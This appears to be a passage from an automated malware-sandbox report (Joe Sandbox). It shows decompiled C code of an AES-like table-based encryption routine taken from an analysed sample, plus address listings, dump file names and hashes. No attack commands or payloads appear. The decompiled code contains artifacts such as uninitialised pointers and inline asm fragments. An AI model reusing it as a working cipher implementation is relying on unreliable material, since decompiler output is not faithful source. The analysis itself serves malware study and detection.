							_t848 = _t1156[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t691 & 0x000000ff) * 4);
							_t1168 =  *_t1181;
							_t618 =  *(0xf14ca40 + (_t806 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t690 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
							_t693 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t690 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t806 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
							_t1169 =  &(_t1168[4]);
							 *_t1181 = _t1169;
							asm("rol eax, 0x10");
							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
							_t815 = _t814 >> 0x10;
							_t696 = _t695 >> 0x10;
							_t849 = _t848 >> 0x10;
							_t699 = _t1169[2] ^  *(0xf14c240 + (_t814 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t693 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t618 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t849 & 0x000000ff) * 4);
							_t824 = _t1169[3] ^  *(0xf14c240 + (_t848 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t814 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t618 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t696 & 0x000000ff) * 4);
							_t998 =  *_t1181;
							_t514 =  *(0xf14ca40 + (_t815 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t695 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t848 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
							_t628 =  *(0xf14c240 + (_t693 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t695 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t815 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
							goto L5;
						} else {
							_t595 = 0xffffffff;
						}
					}
				}
				return _t595;
			}

0x0f141c23
0x0f141c27
0x0f141c2b
0x0f141c2f
0x0f141c33
0x0f141c45
0x0f141c49
0x0f141c50
0x0f141c53
0x0f141c56
0x0f141c59
0x0f141c62
0x0f141fce
0x0f141fce
0x0f141fd1
0x0f141fda
0x0f14202c
0x0f14202e
0x0f142063
0x0f142066
0x0f142093
0x0f142095
0x0f142097
0x0f14209a
0x0f14209d
0x0f1420a0
0x0f1420a3
0x0f1420ac
0x0f1420fe
0x0f142100
0x0f142135
0x0f142138
0x0f142165
0x0f142167
0x0f142169
0x0f14216c
0x0f14216f
0x0f142172
0x0f142175
0x0f14217e
0x0f1421d0
0x0f1421d2
0x0f142207
0x0f14220a
0x0f142237
0x0f142239
0x0f14223b
0x0f14223e
0x0f142241
0x0f142244
0x0f142247
0x0f142250
0x0f1422a2
0x0f1422a4
0x0f1422d9
0x0f1422dc
0x0f142309
0x0f14230b
0x0f14230d
0x0f142310
0x0f142313
0x0f142316
0x0f142319
0x0f142322
0x0f142374
0x0f142376
0x0f1423ab
0x0f1423ae
0x0f1423db
0x0f1423dd
0x0f1423df
0x0f1423e2
0x0f1423e5
0x0f1423e8
0x0f1423eb
0x0f1423f4
0x0f142446
0x0f142448
0x0f14247d
0x0f142480
0x0f1424ad
0x0f1424af
0x0f1424b1
0x0f1424b4
0x0f1424b7
0x0f1424ba
0x0f1424bd
0x0f1424c6
0x0f142518
0x0f14251a
0x0f14254f
0x0f142552
0x0f14257f
0x0f142581
0x0f142583
0x0f142586
0x0f142589
0x0f14258c
0x0f14258f
0x0f142598
0x0f1425ea
0x0f1425ec
0x0f142621
0x0f142624
0x0f142651
0x0f142653
0x0f142655
0x0f142658
0x0f14265b
0x0f14265e
0x0f142661
0x0f14266a
0x0f1426bc
0x0f1426be
0x0f1426f3
0x0f1426f6
0x0f142723
0x0f142725
0x0f142727
0x0f14272a
0x0f14272d
0x0f142730
0x0f142733
0x0f14273c
0x0f14278e
0x0f142790
0x0f1427c5
0x0f1427c8
0x0f1427f5
0x0f1427fe
0x0f142802
0x0f142805
0x0f142808
0x0f14280b
0x0f14280e
0x0f141c68
0x0f141c6e
0x0f141e2a
0x0f141e2a
0x0f141e2d
0x0f141e36
0x0f141e88
0x0f141e8a
0x0f141ebf
0x0f141ec2
0x0f141eef
0x0f141ef1
0x0f141ef3
0x0f141ef6
0x0f141ef9
0x0f141efc
0x0f141eff
0x0f141f08
0x0f141f5a
0x0f141f5c
0x0f141f91
0x0f141f94
0x0f141fc1
0x0f141fc3
0x0f141fc5
0x0f141fc8
0x0f141fcb
0x00000000
0x0f141c74
0x0f141c7a
0x0f141c86
0x0f141c89
0x0f141c92
0x0f141ce4
0x0f141ce6
0x0f141d1b
0x0f141d1e
0x0f141d4b
0x0f141d4d
0x0f141d4f
0x0f141d52
0x0f141d55
0x0f141d58
0x0f141d5b
0x0f141d64
0x0f141db6
0x0f141db8
0x0f141ded
0x0f141df0
0x0f141e1d
0x0f141e1f
0x0f141e21
0x0f141e24
0x0f141e27
0x00000000
0x0f141c7c
0x0f141c7c
0x0f141c7c
0x0f141c7a
0x0f141c6e
0x0f142823

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b471517fa83d8249a252c0ff1c12a526527e9d1139a90d647b739a94fb1a4e
Instruction ID: d63940347cdcc7afaf688d0229c5bebb5e686c9580f334af7229166a81b46635
Opcode Fuzzy Hash: a3b471517fa83d8249a252c0ff1c12a526527e9d1139a90d647b739a94fb1a4e
Instruction Fuzzy Hash: 13722B35C112688FDB84EF6EE454036B3A1E784333B47453EA9816B292D6347578EBEC

Uniqueness

Uniqueness Score: -1.00%

Function 0F141020 Relevance: .7, Instructions: 720
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F141020(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t513;
				signed char _t515;
				signed char _t516;
				signed char _t518;
				signed char _t520;
				signed char _t521;
				signed char _t523;
				signed char _t525;
				signed char _t526;
				signed char _t528;
				signed char _t530;
				signed char _t531;
				signed char _t533;
				signed char _t535;
				signed char _t536;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				signed char _t543;
				signed char _t545;
				signed char _t546;
				signed char _t548;
				signed char _t550;
				signed char _t551;
				signed char _t553;
				signed char _t555;
				signed char _t556;
				signed char _t558;
				signed char _t560;
				signed char _t561;
				void* _t564;
				signed char _t566;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t576;
				signed char _t578;
				signed char _t580;
				signed char _t581;
				signed int _t585;
				signed char _t594;
				signed char _t603;
				signed char _t612;
				signed char _t621;
				signed char _t630;
				signed char _t639;
				signed char _t648;
				signed char _t657;
				signed char _t666;
				signed char _t685;
				signed char _t702;
				signed int _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t728;
				signed char _t729;
				signed char _t730;
				signed char _t731;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed int _t739;
				signed char _t740;
				signed char _t747;
				signed char _t748;
				signed char _t755;
				signed char _t756;
				signed char _t763;
				signed char _t764;
				signed char _t771;
				signed char _t772;
				signed char _t779;
				signed char _t780;
				signed char _t787;
				signed char _t788;
				signed char _t795;
				signed char _t796;
				signed char _t803;
				signed char _t804;
				signed char _t811;
				signed char _t812;
				signed int* _t819;
				signed char _t820;
				signed char _t827;
				signed char _t828;
				signed char _t835;
				signed char _t842;
				signed char _t843;
				signed int _t851;
				signed int* _t924;
				signed int* _t996;
				signed int* _t997;
				signed int* _t998;
				signed int* _t1010;
				signed int* _t1011;
				signed int* _t1023;
				signed int* _t1024;
				signed int* _t1036;
				signed int* _t1037;
				signed int* _t1049;
				signed int* _t1050;
				signed int* _t1062;
				signed int* _t1063;
				signed int* _t1075;
				signed int* _t1076;
				signed int* _t1088;
				signed int* _t1089;
				signed int* _t1101;
				signed int* _t1102;
				signed int* _t1114;
				signed int* _t1115;
				signed int* _t1127;
				signed int* _t1129;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1154;
				signed int* _t1166;
				signed int* _t1167;
				signed int** _t1179;

				_t1179[4] = _t996;
				_t1179[3] = __ebx;
				_t1179[2] = __esi;
				_t1179[1] = __edi;
				_t924 = _t1179[6];
				_t997 = _t1179[8];
				_t851 = _t997[0x3c] & 0x000000ff;
				_t513 =  *_t924 ^  *_t997;
				_t585 = _t924[1] ^ _t997[1];
				_t712 = _t924[2] ^ _t997[2];
				_t739 = _t924[3] ^ _t997[3];
				if(_t851 == 0xa0) {
					L6:
					_t998 =  &(_t997[4]);
					 *_t1179 = _t998;
					asm("rol ebx, 0x10");
					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
					_t740 = _t739 >> 0x10;
					_t516 = _t515 >> 0x10;
					_t713 = _t712 >> 0x10;
					_t714 = _t998[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t516 & 0x000000ff) * 4);
					_t747 = _t998[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t713 & 0x000000ff) * 4);
					_t1010 =  *_t1179;
					_t518 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t515 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t740 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
					_t594 =  *(0xf14aa40 + (_t740 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t515 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
					_t1011 =  &(_t1010[4]);
					 *_t1179 = _t1011;
					asm("rol ebx, 0x10");
					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
					_t748 = _t747 >> 0x10;
					_t521 = _t520 >> 0x10;
					_t715 = _t714 >> 0x10;
					_t716 = _t1011[2] ^  *(0xf14a240 + (_t714 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t747 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t594 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t521 & 0x000000ff) * 4);
					_t755 = _t1011[3] ^  *(0xf14a240 + (_t747 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t518 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t594 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t715 & 0x000000ff) * 4);
					_t1023 =  *_t1179;
					_t523 =  *(0xf14a240 + (_t518 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t520 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t748 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
					_t603 =  *(0xf14aa40 + (_t748 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t714 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t520 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
					_t1024 =  &(_t1023[4]);
					 *_t1179 = _t1024;
					asm("rol ebx, 0x10");
					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
					_t756 = _t755 >> 0x10;
					_t526 = _t525 >> 0x10;
					_t717 = _t716 >> 0x10;
					_t718 = _t1024[2] ^  *(0xf14a240 + (_t716 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t755 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t526 & 0x000000ff) * 4);
					_t763 = _t1024[3] ^  *(0xf14a240 + (_t755 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t523 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t717 & 0x000000ff) * 4);
					_t1036 =  *_t1179;
					_t528 =  *(0xf14a240 + (_t523 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t525 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t756 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
					_t612 =  *(0xf14aa40 + (_t756 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t716 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t525 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
					_t1037 =  &(_t1036[4]);
					 *_t1179 = _t1037;
					asm("rol ebx, 0x10");
					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
					_t764 = _t763 >> 0x10;
					_t531 = _t530 >> 0x10;
					_t719 = _t718 >> 0x10;
					_t720 = _t1037[2] ^  *(0xf14a240 + (_t718 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t763 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t612 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t531 & 0x000000ff) * 4);
					_t771 = _t1037[3] ^  *(0xf14a240 + (_t763 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t528 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t612 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t719 & 0x000000ff) * 4);
					_t1049 =  *_t1179;
					_t533 =  *(0xf14a240 + (_t528 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t764 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
					_t621 =  *(0xf14aa40 + (_t764 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t718 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
					_t1050 =  &(_t1049[4]);
					 *_t1179 = _t1050;
					asm("rol ebx, 0x10");
					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t536 = _t535 >> 0x10;
					_t721 = _t720 >> 0x10;
					_t722 = _t1050[2] ^  *(0xf14a240 + (_t720 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t771 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t621 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t536 & 0x000000ff) * 4);
					_t779 = _t1050[3] ^  *(0xf14a240 + (_t771 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t533 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t621 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t721 & 0x000000ff) * 4);
					_t1062 =  *_t1179;
					_t538 =  *(0xf14a240 + (_t533 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t535 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
					_t630 =  *(0xf14aa40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t720 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t535 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
					_t1063 =  &(_t1062[4]);
					 *_t1179 = _t1063;
					asm("rol ebx, 0x10");
					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
					_t780 = _t779 >> 0x10;
					_t541 = _t540 >> 0x10;
					_t723 = _t722 >> 0x10;
					_t724 = _t1063[2] ^  *(0xf14a240 + (_t722 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t779 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t630 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t541 & 0x000000ff) * 4);
					_t787 = _t1063[3] ^  *(0xf14a240 + (_t779 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t538 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t630 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t723 & 0x000000ff) * 4);
					_t1075 =  *_t1179;
					_t543 =  *(0xf14a240 + (_t538 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t540 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t780 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
					_t639 =  *(0xf14aa40 + (_t780 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t722 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t540 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
					_t1076 =  &(_t1075[4]);
					 *_t1179 = _t1076;
					asm("rol ebx, 0x10");
					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
					_t788 = _t787 >> 0x10;
					_t546 = _t545 >> 0x10;
					_t725 = _t724 >> 0x10;
					_t726 = _t1076[2] ^  *(0xf14a240 + (_t724 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t787 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t639 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t546 & 0x000000ff) * 4);
					_t795 = _t1076[3] ^  *(0xf14a240 + (_t787 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t543 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t639 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t725 & 0x000000ff) * 4);
					_t1088 =  *_t1179;
					_t548 =  *(0xf14a240 + (_t543 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t545 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t788 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
					_t648 =  *(0xf14aa40 + (_t788 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t724 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t545 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
					_t1089 =  &(_t1088[4]);
					 *_t1179 = _t1089;
					asm("rol ebx, 0x10");
					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
					_t796 = _t795 >> 0x10;
					_t551 = _t550 >> 0x10;
					_t727 = _t726 >> 0x10;
					_t728 = _t1089[2] ^  *(0xf14a240 + (_t726 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t795 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t648 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t551 & 0x000000ff) * 4);
					_t803 = _t1089[3] ^  *(0xf14a240 + (_t795 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t548 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t648 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t727 & 0x000000ff) * 4);
					_t1101 =  *_t1179;
					_t553 =  *(0xf14a240 + (_t548 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t550 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t796 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
					_t657 =  *(0xf14aa40 + (_t796 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t726 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t550 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
					_t1102 =  &(_t1101[4]);
					 *_t1179 = _t1102;
					asm("rol ebx, 0x10");
					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
					_t804 = _t803 >> 0x10;
					_t556 = _t555 >> 0x10;
					_t729 = _t728 >> 0x10;
					_t730 = _t1102[2] ^  *(0xf14a240 + (_t728 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t803 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t657 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t556 & 0x000000ff) * 4);
					_t811 = _t1102[3] ^  *(0xf14a240 + (_t803 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t553 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t657 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t729 & 0x000000ff) * 4);
					_t1114 =  *_t1179;
					_t558 =  *(0xf14a240 + (_t553 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t555 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t804 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
					_t666 =  *(0xf14aa40 + (_t804 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t728 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t555 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
					_t1115 =  &(_t1114[4]);
					 *_t1179 = _t1115;
					asm("rol ebx, 0x10");
					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
					_t812 = _t811 >> 0x10;
					_t561 = _t560 >> 0x10;
					_t731 = _t730 >> 0x10;
					_t1127 =  *_t1179;
					_t819 = _t1179[7];
					 *_t819 =  *(0xf14b240 + (_t558 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t560 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t812 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
					_t819[1] =  *(0xf14ba40 + (_t812 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t730 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t560 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
					_t819[2] = _t1115[2] ^  *(0xf14b240 + (_t730 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t811 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t666 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t561 & 0x000000ff) * 4);
					_t819[3] = _t1115[3] ^  *(0xf14b240 + (_t811 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t558 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t666 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t731 & 0x000000ff) * 4);
					_t564 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1129 =  &(_t997[4]);
						 *_t1179 = _t1129;
						asm("rol ebx, 0x10");
						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
						_t820 = _t739 >> 0x10;
						_t567 = _t566 >> 0x10;
						_t732 = _t712 >> 0x10;
						_t733 = _t1129[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t567 & 0x000000ff) * 4);
						_t827 = _t1129[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t732 & 0x000000ff) * 4);
						_t1141 =  *_t1179;
						_t569 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t566 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t820 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
						_t685 =  *(0xf14aa40 + (_t820 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t566 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
						_t1142 =  &(_t1141[4]);
						 *_t1179 = _t1142;
						asm("rol ebx, 0x10");
						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
						_t828 = _t827 >> 0x10;
						_t572 = _t571 >> 0x10;
						_t734 = _t733 >> 0x10;
						_t712 = _t1142[2] ^  *(0xf14a240 + (_t733 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t827 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t685 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t572 & 0x000000ff) * 4);
						_t739 = _t1142[3] ^  *(0xf14a240 + (_t827 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t569 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t685 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t734 & 0x000000ff) * 4);
						_t997 =  *_t1179;
						_t513 =  *(0xf14a240 + (_t569 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t571 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t828 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
						_t585 =  *(0xf14aa40 + (_t828 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t733 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t571 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1154 =  &(_t997[4]);
							 *_t1179 = _t1154;
							asm("rol ebx, 0x10");
							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
							_t835 = _t739 >> 0x10;
							_t576 = _t575 >> 0x10;
							_t735 = _t712 >> 0x10;
							_t736 = _t1154[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t576 & 0x000000ff) * 4);
							_t842 = _t1154[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t735 & 0x000000ff) * 4);
							_t1166 =  *_t1179;
							_t578 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t575 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t835 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
							_t702 =  *(0xf14aa40 + (_t835 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t575 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
							_t1167 =  &(_t1166[4]);
							 *_t1179 = _t1167;
							asm("rol ebx, 0x10");
							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
							_t843 = _t842 >> 0x10;
							_t581 = _t580 >> 0x10;
							_t737 = _t736 >> 0x10;
							_t712 = _t1167[2] ^  *(0xf14a240 + (_t736 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t842 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t702 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t581 & 0x000000ff) * 4);
							_t739 = _t1167[3] ^  *(0xf14a240 + (_t842 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t578 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t702 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t737 & 0x000000ff) * 4);
							_t997 =  *_t1179;
							_t513 =  *(0xf14a240 + (_t578 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t580 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t843 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
